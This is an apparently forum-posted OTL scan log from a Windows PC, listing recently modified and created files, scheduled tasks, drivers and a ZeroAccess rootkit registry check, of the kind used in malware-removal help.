[2015-01-07 14:03:56 | 000,000,892 | ---- | M] () -- C:\Windows\tasks\globalUpdateUpdateTaskMachineUA.job
[2015-01-07 14:03:44 | 000,000,920 | ---- | M] () -- C:\Windows\tasks\FacebookUpdateTaskUserS-1-5-21-3408851026-3105934659-272300781-1001UA.job
[2015-01-07 14:03:41 | 000,002,748 | ---- | M] () -- C:\Windows\tasks\4a263a02-ae51-4b9a-a531-2037e520e833-5_user.job
[2015-01-07 14:03:39 | 000,002,748 | ---- | M] () -- C:\Windows\tasks\4a263a02-ae51-4b9a-a531-2037e520e833-5.job
[2015-01-07 14:03:37 | 000,005,476 | ---- | M] () -- C:\Windows\tasks\4a263a02-ae51-4b9a-a531-2037e520e833-7.job
[2015-01-07 14:03:31 | 000,003,742 | ---- | M] () -- C:\Windows\tasks\4a263a02-ae51-4b9a-a531-2037e520e833-1.job
[2015-01-07 14:03:25 | 000,002,146 | ---- | M] () -- C:\Windows\tasks\798c9d1a-d35a-41a7-b128-4763313e6ae1-4.job
[2015-01-07 14:03:25 | 000,001,510 | ---- | M] () -- C:\Windows\tasks\798c9d1a-d35a-41a7-b128-4763313e6ae1-6.job
[2015-01-07 14:03:25 | 000,001,506 | ---- | M] () -- C:\Windows\tasks\798c9d1a-d35a-41a7-b128-4763313e6ae1-1.job
[2015-01-07 14:03:25 | 000,001,438 | ---- | M] () -- C:\Windows\tasks\798c9d1a-d35a-41a7-b128-4763313e6ae1-5_user.job
[2015-01-07 14:03:25 | 000,001,424 | ---- | M] () -- C:\Windows\tasks\798c9d1a-d35a-41a7-b128-4763313e6ae1-5.job
[2015-01-07 14:03:25 | 000,001,298 | ---- | M] () -- C:\Windows\tasks\798c9d1a-d35a-41a7-b128-4763313e6ae1-2.job
[2015-01-07 14:03:02 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2015-01-06 22:16:19 | 000,001,240 | ---- | M] () -- C:\Users\BHP\Desktop\SpyHunter.lnk
[2015-01-06 22:14:56 | 000,019,984 | ---- | M] () -- C:\Windows\System32\drivers\EsgScanner.sys
[2015-01-06 22:13:01 | 000,000,888 | ---- | M] () -- C:\Windows\tasks\globalUpdateUpdateTaskMachineCore.job
[2015-01-06 22:06:09 | 000,001,026 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2015-01-06 22:06:09 | 000,000,342 | ---- | M] () -- C:\Windows\tasks\DriverToolkit Autorun.job
[2015-01-06 19:16:04 | 000,000,898 | ---- | M] () -- C:\Windows\tasks\FacebookUpdateTaskUserS-1-5-21-3408851026-3105934659-272300781-1001Core.job
[2015-01-06 06:43:12 | 000,043,152 | ---- | M] (StdLib) -- C:\Windows\System32\drivers\{f69f75dd-7e74-4885-b8d1-87b7e0b79ccb}Gw.sys
[2015-01-03 14:14:38 | 2299,817,984 | -HS- | M] () -- C:\hiberfil.sys
[2014-12-31 16:10:52 | 000,048,739 | ---- | M] () -- C:\Users\BHP\Desktop\10898038_790086454398186_7905267530334111904_n.jpg
[2014-12-30 17:19:30 | 1403,472,541 | ---- | M] () -- C:\Windows\MEMORY.DMP
[2014-12-30 14:30:52 | 000,002,339 | ---- | M] () -- C:\Windows\System32\servers.def.vpx
[2014-12-30 14:30:52 | 000,002,339 | ---- | M] () -- C:\Windows\System32\servers.def.lkg
[2014-12-24 12:07:05 | 000,279,345 | ---- | M] () -- C:\Users\BHP\Documents\Bez nazwy.png
[2014-12-24 12:04:44 | 000,001,501 | ---- | M] () -- C:\Users\BHP\AppData\Local\recently-used.xbel
[2014-12-23 18:19:35 | 017,987,236 | ---- | M] () -- C:\Users\BHP\Documents\clip0020.avi
[2014-12-23 18:17:33 | 016,665,974 | ---- | M] () -- C:\Users\BHP\Documents\clip0019.avi
[2014-12-23 18:17:21 | 013,724,774 | ---- | M] () -- C:\Users\BHP\Documents\clip0018.avi
[2014-12-23 18:15:59 | 015,551,620 | ---- | M] () -- C:\Users\BHP\Documents\clip0017.avi
[2014-12-23 18:14:45 | 045,492,526 | ---- | M] () -- C:\Users\BHP\Documents\clip0016.avi
[2014-12-23 18:12:15 | 036,375,596 | ---- | M] () -- C:\Users\BHP\Documents\clip0015.avi
[2014-12-23 18:11:07 | 047,483,554 | ---- | M] () -- C:\Users\BHP\Documents\clip0014.avi
[2014-12-13 04:33:44 | 000,115,712 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\ieUnatt.exe
[2014-12-09 19:08:19 | 000,701,104 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\System32\FlashPlayerApp.exe
[2014-12-09 19:08:19 | 000,071,344 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\System32\FlashPlayerCPLApp.cpl
[1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]
 
[color=#E56717]========== Files Created - No Company Name ==========[/color]
 
[2015-01-07 14:45:28 | 000,380,416 | ---- | C] () -- C:\Users\BHP\Desktop\yz2k5433.exe
[2015-01-06 22:16:19 | 000,001,240 | ---- | C] () -- C:\Users\BHP\Desktop\SpyHunter.lnk
[2015-01-06 22:14:56 | 000,019,984 | ---- | C] () -- C:\Windows\System32\drivers\EsgScanner.sys
[2015-01-06 22:09:49 | 000,002,748 | ---- | C] () -- C:\Windows\tasks\4a263a02-ae51-4b9a-a531-2037e520e833-5_user.job
[2015-01-06 22:09:46 | 000,002,748 | ---- | C] () -- C:\Windows\tasks\4a263a02-ae51-4b9a-a531-2037e520e833-5.job
[2015-01-06 22:09:25 | 000,003,742 | ---- | C] () -- C:\Windows\tasks\4a263a02-ae51-4b9a-a531-2037e520e833-1.job
[2015-01-06 22:08:51 | 000,005,820 | ---- | C] () -- C:\Windows\tasks\4a263a02-ae51-4b9a-a531-2037e520e833-6.job
[2015-01-06 22:08:47 | 000,005,476 | ---- | C] () -- C:\Windows\tasks\4a263a02-ae51-4b9a-a531-2037e520e833-7.job
[2015-01-06 21:29:44 | 000,000,892 | ---- | C] () -- C:\Windows\tasks\globalUpdateUpdateTaskMachineUA.job
[2015-01-06 21:29:42 | 000,000,888 | ---- | C] () -- C:\Windows\tasks\globalUpdateUpdateTaskMachineCore.job
[2014-12-31 16:10:47 | 000,048,739 | ---- | C] () -- C:\Users\BHP\Desktop\10898038_790086454398186_7905267530334111904_n.jpg
[2014-12-30 14:30:52 | 000,002,339 | ---- | C] () -- C:\Windows\System32\servers.def.lkg
[2014-12-30 14:30:51 | 000,002,339 | ---- | C] () -- C:\Windows\System32\servers.def.vpx
[2014-12-24 12:04:44 | 000,001,501 | ---- | C] () -- C:\Users\BHP\AppData\Local\recently-used.xbel
[2014-12-24 12:04:43 | 000,279,345 | ---- | C] () -- C:\Users\BHP\Documents\Bez nazwy.png
[2014-12-23 18:19:24 | 017,987,236 | ---- | C] () -- C:\Users\BHP\Documents\clip0020.avi
[2014-12-23 18:17:23 | 016,665,974 | ---- | C] () -- C:\Users\BHP\Documents\clip0019.avi
[2014-12-23 18:17:13 | 013,724,774 | ---- | C] () -- C:\Users\BHP\Documents\clip0018.avi
[2014-12-23 18:15:53 | 015,551,620 | ---- | C] () -- C:\Users\BHP\Documents\clip0017.avi
[2014-12-23 18:14:23 | 045,492,526 | ---- | C] () -- C:\Users\BHP\Documents\clip0016.avi
[2014-12-23 18:11:54 | 036,375,596 | ---- | C] () -- C:\Users\BHP\Documents\clip0015.avi
[2014-12-23 18:10:41 | 047,483,554 | ---- | C] () -- C:\Users\BHP\Documents\clip0014.avi
[2014-10-21 18:29:36 | 000,004,534 | ---- | C] () -- C:\Users\BHP\AppData\Roaming\CamStudio.cfg
[2014-10-21 18:29:36 | 000,000,408 | ---- | C] () -- C:\Users\BHP\AppData\Roaming\CamShapes.ini
[2014-10-21 18:29:36 | 000,000,408 | ---- | C] () -- C:\Users\BHP\AppData\Roaming\CamLayout.ini
[2014-10-21 18:29:36 | 000,000,051 | ---- | C] () -- C:\Users\BHP\AppData\Roaming\Camdata.ini
[2014-10-21 18:24:06 | 000,000,096 | ---- | C] () -- C:\Users\BHP\AppData\Roaming\version2.xml
[2014-09-07 17:02:49 | 000,000,266 | RHS- | C] () -- C:\ProgramData\ntuser.pol
[2014-09-01 09:18:44 | 000,002,086 | ---- | C] () -- C:\Users\BHP\AppData\Roaming\WY
[2014-09-01 09:18:44 | 000,001,248 | ---- | C] () -- C:\Users\BHP\AppData\Roaming\DIQRSUU
[2014-06-12 18:06:20 | 000,151,552 | ---- | C] () -- C:\Windows\KMService.exe
[2014-06-12 18:06:20 | 000,008,192 | ---- | C] () -- C:\Windows\System32\srvany.exe
[2014-06-12 17:58:40 | 000,180,632 | ---- | C] () -- C:\Windows\System32\drivers\aswVmm.sys
[2014-06-12 17:58:39 | 000,049,944 | ---- | C] () -- C:\Windows\System32\drivers\aswRvrt.sys
[2014-06-12 17:58:39 | 000,024,184 | ---- | C] () -- C:\Windows\System32\drivers\aswHwid.sys
[2013-05-28 21:22:48 | 000,641,024 | ---- | C] () -- C:\Windows\System32\ficvdec_x86.dll
 
[color=#E56717]========== ZeroAccess Check ==========[/color]
 
[2009-07-14 05:42:31 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2014-06-25 02:41:30 | 012,874,240 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2010-11-20 13:19:02 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
"" = %systemroot%\system32\wbem\wbemess.dll -- [2009-07-14 02:16:17 | 000,342,528 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both

< End of report >